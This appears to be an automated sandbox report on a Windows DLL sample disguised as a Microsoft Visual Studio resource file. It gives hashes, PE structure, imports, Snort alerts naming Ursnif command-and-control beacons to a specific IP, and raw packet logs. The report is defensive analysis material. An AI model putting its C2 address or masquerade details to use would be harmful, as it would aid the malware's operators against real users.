                                                                                                                                                                                                                                                                                  SHA1:EFF33017BB99DC65666013F135EC0DEEB164F4ED
                                                                                                                                                                                                                                                                                  SHA-256:291122EF21B25EE009216E42963D0F71F7E60B7EEBB3603A5E4C96B7A5E6DB78
                                                                                                                                                                                                                                                                                  SHA-512:26FB952FD75375C9D17BE34DD5DF906B9602AA7CB06FCF4BC4F50E9D4F65DFCE8E64DF3F5774FD8D09E6562B81215609559C80B12B275C30877BBC5648D06ED5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: ...................................FL..................F.@.. .....@.>....;.p......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L.GSkn....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.GSsn..............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.JGSrn.....R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............PU......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ARUU92NEV262I79KAFPG.temp
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):5149
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.1729259632534914
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:jdiwPRfI9C9GrIoClyAsASF0diwPRfI9h683GrIoClyAczTdiwPRfI9x9GrIoClR:BPRfL9SGyAJTPRfo3SGyAGPRfc9SGyAf
                                                                                                                                                                                                                                                                                  MD5:0359DFE39C0A15ACE4F9E8A86C9DA83F
                                                                                                                                                                                                                                                                                  SHA1:EFF33017BB99DC65666013F135EC0DEEB164F4ED
                                                                                                                                                                                                                                                                                  SHA-256:291122EF21B25EE009216E42963D0F71F7E60B7EEBB3603A5E4C96B7A5E6DB78
                                                                                                                                                                                                                                                                                  SHA-512:26FB952FD75375C9D17BE34DD5DF906B9602AA7CB06FCF4BC4F50E9D4F65DFCE8E64DF3F5774FD8D09E6562B81215609559C80B12B275C30877BBC5648D06ED5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NUIAG1F98M3TYTKEDYOI.temp
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):5149
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.1729259632534914
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:jdiwPRfI9C9GrIoClyAsASF0diwPRfI9h683GrIoClyAczTdiwPRfI9x9GrIoClR:BPRfL9SGyAJTPRfo3SGyAGPRfc9SGyAf
                                                                                                                                                                                                                                                                                  MD5:0359DFE39C0A15ACE4F9E8A86C9DA83F
                                                                                                                                                                                                                                                                                  SHA1:EFF33017BB99DC65666013F135EC0DEEB164F4ED
                                                                                                                                                                                                                                                                                  SHA-256:291122EF21B25EE009216E42963D0F71F7E60B7EEBB3603A5E4C96B7A5E6DB78
                                                                                                                                                                                                                                                                                  SHA-512:26FB952FD75375C9D17BE34DD5DF906B9602AA7CB06FCF4BC4F50E9D4F65DFCE8E64DF3F5774FD8D09E6562B81215609559C80B12B275C30877BBC5648D06ED5
                                                                                                                                                                                                                                                                                  Malicious:false

                                                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.700886953717853
                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                  File name:a04.dll
                                                                                                                                                                                                                                                                                  File size:389632
                                                                                                                                                                                                                                                                                  MD5:a04cc72f0946720cc875ed228f565c1d
                                                                                                                                                                                                                                                                                  SHA1:58b12ddffb7015e8857209c60a06ed4419a23641
                                                                                                                                                                                                                                                                                  SHA256:e04823c56b627e74c92656340de38aed9804af65040bbed746b206de5a122dc5
                                                                                                                                                                                                                                                                                  SHA512:dd899e5fab849ec5e27408597b39ff009866304a1d9b1a4e3ce126b72c25155fd379cbb6395e74f7a05b2d6a5f46bf17d631e261d90e778c791f7cb8543ebc32
                                                                                                                                                                                                                                                                                  SSDEEP:6144:pguK47sx+R4DNoapfo2LnHhKiVbI9hrse5Sa3/02sIYzfThE:pguhxwo2okbihRSI/rsdfThE
                                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>p..P#..P#..P#...#..P#...##.P#...#..P#...#..P#..Q#*.P#...#..P#...#..P#...#..P#...#..P#Rich..P#........PE..L....(.U...........

                                                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                                                  Icon Hash:928094968e869ed2

                                                                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Entrypoint:0x403d11
                                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                                                                                  Time Stamp:0x5514280C [Thu Mar 26 15:38:52 2015 UTC]
                                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                  Import Hash:a554a8c84a5b556026c60d682c670603

                                                                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                                                  cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                                                                                                                                                                  jne 00007F34C0AD4A07h
                                                                                                                                                                                                                                                                                  call 00007F34C0ADACE0h
                                                                                                                                                                                                                                                                                  push dword ptr [ebp+10h]
                                                                                                                                                                                                                                                                                  push dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                  call 00007F34C0AD4A0Ch
                                                                                                                                                                                                                                                                                  add esp, 0Ch
                                                                                                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                                                                                                  retn 000Ch
                                                                                                                                                                                                                                                                                  push 0000000Ch
                                                                                                                                                                                                                                                                                  push 0044B6B8h
                                                                                                                                                                                                                                                                                  call 00007F34C0AD6345h
                                                                                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                                                                                  inc eax
                                                                                                                                                                                                                                                                                  mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                                                                  test esi, esi
                                                                                                                                                                                                                                                                                  jne 00007F34C0AD4A0Eh
                                                                                                                                                                                                                                                                                  cmp dword ptr [0044E588h], esi
                                                                                                                                                                                                                                                                                  je 00007F34C0AD4AEAh
                                                                                                                                                                                                                                                                                  and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                                                                                                  cmp esi, 01h
                                                                                                                                                                                                                                                                                  je 00007F34C0AD4A07h
                                                                                                                                                                                                                                                                                  cmp esi, 02h
                                                                                                                                                                                                                                                                                  jne 00007F34C0AD4A37h
                                                                                                                                                                                                                                                                                  mov ecx, dword ptr [004430B8h]
                                                                                                                                                                                                                                                                                  test ecx, ecx
                                                                                                                                                                                                                                                                                  je 00007F34C0AD4A0Eh
                                                                                                                                                                                                                                                                                  push dword ptr [ebp+10h]
                                                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                  call ecx
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-1Ch], eax
                                                                                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                                                                                  je 00007F34C0AD4AB7h
                                                                                                                                                                                                                                                                                  push dword ptr [ebp+10h]
                                                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                  call 00007F34C0AD4816h
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-1Ch], eax
                                                                                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                                                                                  je 00007F34C0AD4AA0h
                                                                                                                                                                                                                                                                                  mov ebx, dword ptr [ebp+10h]
                                                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                  call 00007F34C0AE545Fh
                                                                                                                                                                                                                                                                                  mov edi, eax
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-1Ch], edi
                                                                                                                                                                                                                                                                                  cmp esi, 01h
                                                                                                                                                                                                                                                                                  jne 00007F34C0AD4A2Ah
                                                                                                                                                                                                                                                                                  test edi, edi
                                                                                                                                                                                                                                                                                  jne 00007F34C0AD4A26h
                                                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                  call 00007F34C0AE5447h
                                                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                  call 00007F34C0AD47DCh
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [004430B8h]
                                                                                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                                                                                  je 00007F34C0AD4A09h
                                                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                  call eax

                                                                                                                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                                                  • [EXP] VS2013 UPD3 build 30723
                                                                                                                                                                                                                                                                                  • [LNK] VS2013 UPD3 build 30723
                                                                                                                                                                                                                                                                                  • [C++] VS2013 build 21005
                                                                                                                                                                                                                                                                                  • [ASM] VS2013 build 21005
                                                                                                                                                                                                                                                                                  • [ C ] VS2013 build 21005
                                                                                                                                                                                                                                                                                  • [RES] VS2013 build 21005
                                                                                                                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x4bba0 | 0x4c | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4bbec | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x560000 | 0x10e90 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x571000 | 0x1c80 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x42270 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4b048 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x42000 | 0x214 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4013b | 0x40200 | False | 0.751941703216 | data | 6.83409400376 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x42000 | 0xa7e8 | 0xa800 | False | 0.535505022321 | data | 5.68603541384 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4d000 | 0x512420 | 0x1600 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x560000 | 0x10e90 | 0x11000 | False | 0.156264361213 | data | 5.12897604269 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x571000 | 0x1c80 | 0x1e00 | False | 0.755208333333 | data | 6.58165390017 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x560650 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 318767104, next used block 117440512 | English | United States
RT_GROUP_ICON | 0x570e78 | 0x14 | data | English | United States
RT_VERSION | 0x560130 | 0x3a0 | data | English | United States
RT_MANIFEST | 0x5604d0 | 0x17d | XML 1.0 document text | English | United States

Imports

DLL | Import
KERNEL32.dll | HeapFree, CreateDirectoryW, VirtualFree, GetSystemTimeAsFileTime, LoadLibraryW, Sleep, HeapCreate, HeapValidate, SetSystemPowerState, CreateFileW, GetTempPathW, VirtualAlloc, VirtualProtectEx, ResetEvent, GetLocalTime, DeviceIoControl, VirtualProtect, DeleteFileW, WriteConsoleW, SetFilePointerEx, GetConsoleCP, FlushFileBuffers, GetCurrentProcess, ReadConsoleW, GetConsoleMode, ReadFile, LCMapStringW, GetStringTypeW, HeapReAlloc, OutputDebugStringW, GetOEMCP, GetACP, IsValidCodePage, LoadLibraryExW, GetModuleHandleW, HeapAlloc, GetCPInfo, FindFirstChangeNotificationW, SetStdHandle, HeapCompact, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, TerminateProcess, InitializeCriticalSectionAndSpinCount, SetUnhandledExceptionFilter, UnhandledExceptionFilter, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetModuleFileNameA, SetEndOfFile, SetLastError, EncodePointer, DecodePointer, GetCommandLineA, GetCurrentThreadId, RaiseException, RtlUnwind, IsDebuggerPresent, IsProcessorFeaturePresent, GetLastError, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, WideCharToMultiByte, GetStdHandle, WriteFile, GetModuleFileNameW, GetProcessHeap, HeapSize, EnterCriticalSection, LeaveCriticalSection, GetFileType, DeleteCriticalSection, GetStartupInfoW, CloseHandle
USER32.dll | GetClientRect, GetSysColorBrush, CreatePopupMenu, CheckDlgButton, GetDesktopWindow, EndDialog, CreateDialogIndirectParamW, OffsetRect, LoadIconW, DefWindowProcW, GetPropW, SetWindowTextW, UnregisterHotKey, BeginDeferWindowPos, DeferWindowPos, LoadBitmapW, CloseClipboard, GetWindowRect, MapDialogRect, GetMessageW, RegisterWindowMessageW, DialogBoxIndirectParamW, IsDialogMessageW, CreateMenu, GetIconInfo, TranslateMessage, GetForegroundWindow, SendMessageTimeoutW
GDI32.dll | SetViewportExtEx, OffsetViewportOrgEx, ScaleWindowExtEx, ScaleViewportExtEx
ole32.dll | OleSetContainedObject, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, CoCreateInstance
WININET.dll | InternetOpenW, InternetReadFile, InternetConnectW, HttpSendRequestW, InternetSetOptionW, HttpAddRequestHeadersW, HttpQueryInfoW, HttpOpenRequestW, InternetCloseHandle

Exports

Name | Ordinal | Address
DllRegisterServer | 1 | 0x414f90

Version Infos

Description | Data
LegalCopyright | Microsoft Corporation. All rights reserved.
InternalName | vsmsoui.dll
FileVersion | 8.0.60727.58 (RTM.060727-6800)
CompanyName | Microsoft Corporation
ProductName | Microsoft Visual Studio 2007
ProductVersion | 8.0.60727.58
FileDescription | Development Environment VSMSO Resource DLL
OriginalFilename | vsmsoui.dll
Translation | 0x0409 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/07/21-15:51:52.671546 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 51726 | 8.8.8.8 | 192.168.2.4
10/07/21-15:53:08.238803 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49936 | 80 | 192.168.2.4 | 87.106.18.141
10/07/21-15:53:08.238803 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49936 | 80 | 192.168.2.4 | 87.106.18.141
10/07/21-15:53:29.599541 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49961 | 80 | 192.168.2.4 | 87.106.18.141
10/07/21-15:53:29.599541 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49961 | 80 | 192.168.2.4 | 87.106.18.141
10/07/21-15:53:34.574084 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49965 | 80 | 192.168.2.4 | 87.106.18.141
10/07/21-15:54:06.183676 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49997 | 80 | 192.168.2.4 | 87.106.18.141
10/07/21-15:54:06.183676 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49997 | 80 | 192.168.2.4 | 87.106.18.141

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.846930027 CEST44349806172.67.69.19192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.847048998 CEST49807443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.847084045 CEST44349807172.67.69.19192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.847197056 CEST49807443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.847238064 CEST49806443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.847239017 CEST49805443192.168.2.4172.217.168.38
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.847273111 CEST44349805172.217.168.38192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.847348928 CEST49805443192.168.2.4172.217.168.38
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.857497931 CEST49804443192.168.2.4172.217.168.38
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.857537031 CEST44349804172.217.168.38192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.858382940 CEST49807443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.858411074 CEST44349807172.67.69.19192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.858576059 CEST49805443192.168.2.4172.217.168.38
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.858613968 CEST44349805172.217.168.38192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.858619928 CEST49806443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.858643055 CEST44349806172.67.69.19192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.902854919 CEST44349806172.67.69.19192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.903197050 CEST49806443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.903661966 CEST44349807172.67.69.19192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.903812885 CEST49807443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.913876057 CEST44349804172.217.168.38192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.913990974 CEST49804443192.168.2.4172.217.168.38
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.918673992 CEST44349805172.217.168.38192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.918817043 CEST49805443192.168.2.4172.217.168.38
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.938399076 CEST49806443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.938420057 CEST44349806172.67.69.19192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.938811064 CEST44349806172.67.69.19192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.939038038 CEST49806443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.943435907 CEST49807443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.943460941 CEST44349807172.67.69.19192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.943882942 CEST44349807172.67.69.19192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.943949938 CEST49807443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.948030949 CEST49806443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.948213100 CEST49804443192.168.2.4172.217.168.38
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.948257923 CEST44349804172.217.168.38192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.948645115 CEST44349804172.217.168.38192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.948687077 CEST49804443192.168.2.4172.217.168.38
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.948704004 CEST49804443192.168.2.4172.217.168.38
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.952291012 CEST49805443192.168.2.4172.217.168.38
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.952322006 CEST44349805172.217.168.38192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.952657938 CEST44349805172.217.168.38192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.952900887 CEST49805443192.168.2.4172.217.168.38
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.966177940 CEST44349804172.217.168.38192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.966268063 CEST49804443192.168.2.4172.217.168.38
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.966279984 CEST44349804172.217.168.38192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.966296911 CEST44349804172.217.168.38192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.966367960 CEST49804443192.168.2.4172.217.168.38
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.970707893 CEST49804443192.168.2.4172.217.168.38
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.970725060 CEST44349804172.217.168.38192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.972028971 CEST44349806172.67.69.19192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.972174883 CEST44349806172.67.69.19192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.972199917 CEST49806443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.972276926 CEST49806443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.982199907 CEST49806443192.168.2.4172.67.69.19
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:51.982223034 CEST44349806172.67.69.19192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.480870962 CEST49810443192.168.2.4142.250.203.98
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.480925083 CEST49811443192.168.2.4142.250.203.98
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.480981112 CEST44349811142.250.203.98192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.480981112 CEST44349810142.250.203.98192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.481117010 CEST49810443192.168.2.4142.250.203.98
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.481136084 CEST49811443192.168.2.4142.250.203.98
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.481868029 CEST49811443192.168.2.4142.250.203.98
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.481901884 CEST44349811142.250.203.98192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.482832909 CEST49810443192.168.2.4142.250.203.98
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.482865095 CEST44349810142.250.203.98192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.542243004 CEST49812443192.168.2.418.156.81.187
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.542299986 CEST4434981218.156.81.187192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.542385101 CEST49813443192.168.2.418.156.81.187
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.542423964 CEST49812443192.168.2.418.156.81.187
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.542435884 CEST4434981318.156.81.187192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.542512894 CEST49813443192.168.2.418.156.81.187
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.542768955 CEST44349811142.250.203.98192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.542993069 CEST49811443192.168.2.4142.250.203.98
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.543435097 CEST49812443192.168.2.418.156.81.187
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.543474913 CEST4434981218.156.81.187192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.543698072 CEST49813443192.168.2.418.156.81.187
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.543724060 CEST4434981318.156.81.187192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.544836998 CEST44349810142.250.203.98192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.545084000 CEST49810443192.168.2.4142.250.203.98
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.552277088 CEST49811443192.168.2.4142.250.203.98
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.552309990 CEST44349811142.250.203.98192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:52.552715063 CEST44349811142.250.203.98192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:53.017086983 CEST4434982076.223.111.131192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:53.017201900 CEST4434982076.223.111.131192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:53.017246962 CEST49820443192.168.2.476.223.111.131
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:51:53.017263889 CEST49820443192.168.2.476.223.111.131
